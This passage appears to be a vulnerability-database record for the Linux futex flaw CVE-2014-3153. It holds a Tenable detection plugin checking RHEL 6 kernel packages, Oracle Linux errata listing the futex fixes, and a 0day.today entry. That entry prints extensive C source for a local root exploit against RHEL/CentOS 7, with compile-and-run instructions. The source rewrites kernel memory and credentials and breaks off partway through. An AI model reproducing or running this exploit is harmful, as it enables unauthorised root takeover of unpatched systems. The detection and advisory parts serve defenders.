vCPUs\nallocated. To resolve this problem, a patch has been applied to limit\nthe rate of the global clock updates. (BZ#1102253)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. 
The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3153\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2014:0900\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0900\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", 
reference:\"kernel-debug-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-358.46.1.el6\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"python-perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-358.46.1.el6\")) 
flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "kernel-uek\n[3.8.13-35.1.1.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1) (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153} {CVE-2014-3153}", "edition": 4, "modified": "2014-06-06T00:00:00", "published": "2014-06-06T00:00:00", "id": "ELSA-2014-3037", "href": "http://linux.oracle.com/errata/ELSA-2014-3037.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:54", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "kernel-uek\n[2.6.32-400.36.2uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Forbid uaddr1 == 
uaddr2 in futex_requeue(..., requeue_pi=1) (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153} {CVE-2014-3153}", "edition": 4, "modified": "2014-06-07T00:00:00", "published": "2014-06-07T00:00:00", "id": "ELSA-2014-3039", "href": "http://linux.oracle.com/errata/ELSA-2014-3039.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "[2.6.39-400.215.2]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153} {CVE-2014-3153}", "edition": 4, "modified": "2014-06-07T00:00:00", "published": "2014-06-07T00:00:00", "id": "ELSA-2014-3038", "href": "http://linux.oracle.com/errata/ELSA-2014-3038.html", "title": "unbreakable enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-03T17:25:46", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2014-11-26T00:00:00", "type": "zdt", "title": "Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406 Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2014-11-26T00:00:00", "id": "1337DAY-ID-22925", "href": "https://0day.today/exploit/description/22925", "sourceData": "/*\r\n * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406\r\n * By Kaiqu Chen ( [email\u00a0protected] )\r\n * Based on libfutex and the expoilt for Android by GeoHot.\r\n *\r\n * Usage:\r\n * $gcc exploit.c -o exploit 
-lpthread\r\n * $./exploit\r\n *\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdbool.h>\r\n#include <pthread.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <linux/futex.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <sys/syscall.h>\r\n#include <sys/resource.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h> \r\n#include <netinet/tcp.h> \r\n \r\n#define ARRAY_SIZE(a) (sizeof (a) / sizeof (*(a)))\r\n \r\n#define FUTEX_WAIT_REQUEUE_PI 11\r\n#define FUTEX_CMP_REQUEUE_PI 12\r\n#define USER_PRIO_BASE 120\r\n#define LOCAL_PORT 5551\r\n \r\n#define SIGNAL_HACK_KERNEL 12\r\n#define SIGNAL_THREAD_EXIT 10\r\n \r\n#define OFFSET_PID 0x4A4\r\n#define OFFSET_REAL_PARENT 0x4B8\r\n#define OFFSET_CRED 0x668\r\n \r\n#define SIZEOF_CRED 160\r\n#define SIZEOF_TASK_STRUCT 2912\r\n#define OFFSET_ADDR_LIMIT 0x20\r\n \r\n#define PRIO_LIST_OFFSET 8 \r\n#define NODE_LIST_OFFSET (PRIO_LIST_OFFSET + sizeof(struct list_head))\r\n#define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET)\r\n#define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET)\r\n#define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET)\r\n#define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET)\r\n#define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long))\r\n#define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head))\r\n \r\n////////////////////////////////////////////////////////////////////\r\nstruct task_struct;\r\n \r\nstruct thread_info {\r\n struct task_struct *task;\r\n void *exec_domain;\r\n int flags;\r\n int status;\r\n int cpu;\r\n int preempt_count;\r\n void *addr_limit;\r\n};\r\n \r\nstruct list_head {\r\n struct list_head *next;\r\n struct list_head *prev;\r\n};\r\n \r\nstruct plist_head {\r\n struct list_head node_list;\r\n};\r\n \r\nstruct plist_node {\r\n int prio;\r\n 
struct list_head prio_list;\r\n struct list_head node_list;\r\n};\r\n \r\nstruct rt_mutex {\r\n unsigned long wait_lock;\r\n struct plist_head wait_list;\r\n struct task_struct *owner;\r\n};\r\n \r\nstruct rt_mutex_waiter {\r\n struct plist_node list_entry;\r\n struct plist_node pi_list_entry;\r\n struct task_struct *task;\r\n struct rt_mutex *lock;\r\n};\r\n \r\nstruct mmsghdr {\r\n struct msghdr msg_hdr;\r\n unsigned int msg_len;\r\n};\r\n \r\nstruct cred {\r\n int usage;\r\n int uid; /* real UID of the task */\r\n int gid; /* real GID of the task */\r\n int suid; /* saved UID of the task */\r\n int sgid; /* saved GID of the task */\r\n int euid; /* effective UID of the task */\r\n int egid; /* effective GID of the task */\r\n int fsuid; /* UID for VFS ops */\r\n int fsgid; /* GID for VFS ops */\r\n};\r\n \r\n////////////////////////////////////////////////////////////////////\r\n \r\nstatic int swag = 0;\r\nstatic int swag2 = 0;\r\nstatic int main_pid;\r\n \r\nstatic pid_t waiter_thread_tid;\r\n \r\nstatic pthread_mutex_t hacked_lock;\r\nstatic pthread_cond_t hacked;\r\n \r\nstatic pthread_mutex_t done_lock;\r\nstatic pthread_cond_t done;\r\n \r\nstatic pthread_mutex_t is_thread_desched_lock;\r\nstatic pthread_cond_t is_thread_desched;\r\n \r\nstatic volatile int do_socket_tid_read = 0;\r\nstatic volatile int did_socket_tid_read = 0;\r\n \r\nstatic volatile int do_dm_tid_read = 0;\r\nstatic volatile int did_dm_tid_read = 0;\r\n \r\nstatic pid_t last_tid = 0;\r\n \r\nstatic volatile int_sync_time_out = 0;\r\n \r\nstruct thread_info thinfo;\r\nchar task_struct_buf[SIZEOF_TASK_STRUCT];\r\nstruct cred cred_buf;\r\n \r\nstruct thread_info *hack_thread_stack = NULL;\r\n \r\npthread_t thread_client_to_setup_rt_waiter;\r\n \r\nint listenfd;\r\nint sockfd;\r\nint clientfd;\r\n \r\n////////////////////////////////////////////////////////////////\r\nint gettid()\r\n{\r\n return syscall(__NR_gettid);\r\n}\r\n \r\nssize_t read_pipe(void *kbuf, void *ubuf, size_t count) {\r\n 
int pipefd[2];\r\n ssize_t len;\r\n \r\n pipe(pipefd);\r\n \r\n len = write(pipefd[1], kbuf, count);\r\n \r\n if (len != count) {\r\n printf(\"Thread %d failed in reading @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n while(1) { sleep(10); }\r\n }\r\n \r\n read(pipefd[0], ubuf, count);\r\n \r\n close(pipefd[0]);\r\n close(pipefd[1]);\r\n \r\n return len;\r\n}\r\n \r\nssize_t write_pipe(void *kbuf, void *ubuf, size_t count) {\r\n int pipefd[2];\r\n ssize_t len;\r\n \r\n pipe(pipefd);\r\n \r\n write(pipefd[1], ubuf, count);\r\n len = read(pipefd[0], kbuf, count);\r\n \r\n if (len != count) {\r\n printf(\"Thread %d failed in writing @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n while(1) { sleep(10); }\r\n }\r\n \r\n close(pipefd[0]);\r\n close(pipefd[1]);\r\n \r\n return len;\r\n}\r\n \r\nint pthread_cancel_immediately(pthread_t thid)\r\n{\r\n pthread_kill(thid, SIGNAL_THREAD_EXIT);\r\n pthread_join(thid, NULL);\r\n return 0;\r\n}\r\n \r\nvoid set_addr_limit(void *sp)\r\n{\r\n long newlimit = -1;\r\n write_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long));\r\n}\r\n \r\nvoid set_cred(struct cred *kcred)\r\n{\r\n struct cred cred_buf;\r\n int len;\r\n \r\n len = read_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n cred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0;\r\n cred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0;\r\n len = write_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n}\r\n \r\nstruct rt_mutex_waiter *pwaiter11;\r\n \r\nvoid set_parent_cred(void *sp, int parent_tid)\r\n{\r\n int len;\r\n int tid;\r\n struct task_struct *pparent;\r\n struct cred *pcred;\r\n \r\n set_addr_limit(sp);\r\n \r\n len = read_pipe(sp, &thinfo, sizeof(thinfo));\r\n if(len != sizeof(thinfo)) {\r\n printf(\"Read %p error %d\\n\", sp, len);\r\n }\r\n \r\n void *ptask = thinfo.task;\r\n len = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n tid = *(int *)(task_struct_buf + OFFSET_PID);\r\n \r\n while(tid != 0 && tid != 
parent_tid) {\r\n pparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT);\r\n len = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n tid = *(int *)(task_struct_buf + OFFSET_PID);\r\n }\r\n \r\n if(tid == parent_tid) {\r\n pcred = *(struct cred **)(task_struct_buf + OFFSET_CRED);\r\n set_cred(pcred);\r\n } else\r\n printf(\"Pid %d not found\\n\", parent_tid);\r\n return;\r\n}\r\n \r\nstatic int read_voluntary_ctxt_switches(pid_t pid)\r\n{\r\n char filename[256];\r\n FILE *fp;\r\n int vcscnt = -1;\r\n \r\n sprintf(filename, \"/proc/self/task/%d/status\", pid);\r\n fp = fopen(filename, \"rb\");\r\n if (fp) {\r\n char filebuf[4096];\r\n char *pdest;\r\n fread(filebuf, 1, sizeof filebuf, fp);\r\n pdest = strstr(filebuf, \"voluntary_ctxt_switches\");\r\n vcscnt = atoi(pdest + 0x19);\r\n fclose(fp);\r\n }\r\n return vcscnt;\r\n}\r\n \r\nstatic void sync_timeout_task(int sig)\r\n{\r\n int_sync_time_out = 1;\r\n}\r\n \r\nstatic int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n while (*do_request == 0) { }\r\n printf(\"Press RETURN after one second...\");\r\n *did_request = 1;\r\n getchar();\r\n return 0;\r\n}\r\n \r\nstatic int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n struct sigaction act;\r\n int vcscnt;\r\n int_sync_time_out = 0;\r\n \r\n act.sa_handler = sync_timeout_task;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGALRM, &act, NULL);\r\n \r\n alarm(3);\r\n while (*do_request == 0) {\r\n if (int_sync_time_out)\r\n return -1;\r\n }\r\n \r\n alarm(0);\r\n vcscnt = read_voluntary_ctxt_switches(pid);\r\n *did_request = 1;\r\n while (read_voluntary_ctxt_switches(pid) != vcscnt + 1) {\r\n usleep(10);\r\n }\r\n \r\n return 0;\r\n}\r\n \r\nstatic void sync_with_parent(int volatile *do_request, int volatile *did_request)\r\n{\r\n *do_request = 1;\r\n while (*did_request == 0) { }\r\n}\r\n \r\nvoid 
fix_rt_mutex_waiter_list(struct rt_mutex *pmutex)\r\n{\r\n struct rt_mutex_waiter *pwaiter6, *pwaiter7;\r\n struct rt_mutex_waiter waiter6, waiter7;\r\n struct rt_mutex mutex;\r\n if(!pmutex)\r\n return;\r\n read_pipe(pmutex, &mutex, sizeof(mutex));\r\n pwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next);\r\n if(!pwaiter6)\r\n return;\r\n read_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n pwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next);\r\n if(!pwaiter7)\r\n return;\r\n read_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n \r\n waiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next;\r\n waiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev;\r\n mutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next;\r\n waiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev;\r\n \r\n write_pipe(pmutex, &mutex, sizeof(mutex));\r\n write_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n write_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n}\r\n \r\nstatic void void_handler(int signum)\r\n{\r\n pthread_exit(0);\r\n}\r\n \r\nstatic void kernel_hack_task(int signum)\r\n{\r\n struct rt_mutex *prt_mutex, rt_mutex;\r\n struct rt_mutex_waiter rt_waiter11;\r\n int tid = syscall(__NR_gettid);\r\n int pid = getpid();\r\n \r\n set_parent_cred(hack_thread_stack, main_pid);\r\n \r\n read_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11));\r\n \r\n prt_mutex = rt_waiter11.lock;\r\n read_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex));\r\n \r\n void *ptask_struct = rt_mutex.owner;\r\n ptask_struct = (void *)((long)ptask_struct & ~ 0xF);\r\n int len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n int *ppid = (int *)(task_struct_buf + OFFSET_PID);\r\n void **pstack = (void **)&task_struct_buf[8];\r\n void *owner_sp = *pstack;\r\n set_addr_limit(owner_sp);\r\n \r\n pthread_mutex_lock(&hacked_lock);\r\n pthread_cond_signal(&hacked);\r\n pthread_mutex_unlock(&hacked_lock);\r\n}\r\n 
\r\nstatic void *call_futex_lock_pi_with_priority(void *arg)\r\n{\r\n int prio;\r\n struct sigaction act;\r\n int ret;\r\n \r\n prio = (long)arg;\r\n last_tid = syscall(__NR_gettid);\r\n \r\n pthread_mutex_lock(&is_thread_desched_lock);\r\n pthread_cond_signal(&is_thread_desched);\r\n \r\n act.sa_handler = void_handler;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n \r\n act.sa_handler = kernel_hack_task;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGNAL_HACK_KERNEL, &act, NULL);\r\n \r\n setpriority(PRIO_PROCESS, 0, prio);\r\n \r\n pthread_mutex_unlock(&is_thread_desched_lock);\r\n \r\n sync_with_parent(&do_dm_tid_read, &did_dm_tid_read);\r\n \r\n ret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 